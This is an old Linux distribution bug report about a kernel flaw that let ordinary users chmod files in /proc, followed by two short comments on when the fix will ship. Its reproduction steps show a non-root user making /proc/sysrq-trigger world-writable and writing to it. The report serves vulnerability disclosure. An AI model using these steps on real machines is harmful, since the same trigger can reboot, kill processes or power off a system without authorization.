From Bugzilla Helper: User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040616 Description of problem: Over two weeks ago, a serious locally exploitable security hole was found in the kernel. See here: http://lkml.org/lkml/2004/7/3/61 A normal user can chmod most files in /proc. Version-Release number of selected component (if applicable): 2.6.6-1.435.2.3smp How reproducible: Always Steps to Reproduce: charm:~$ uname -r 2.6.6-1.435.2.3smp charm:~$ id -u 154 charm:~$ chmod a+w /proc/sysrq-trigger charm:~$ ls -l /proc/sysrq-trigger --w--w--w- 1 root root 0 Jul 18 16:26 /proc/sysrq-trigger charm:~$ echo / > /proc/sysrq-trigger charm:~$ dmesg | tail -1 SysRq : HELP : loglevel0-8 reBoot tErm kIll saK showMem powerOff showPc unRaw Sync showTasks Unmount Actual Results: chmod succeeds Expected Results: chmod fails Additional info:
this got fixed in mainline, did it make it into the 521 update for FC2 ? I'll be doing a 2.6.9 based FC2 update soon.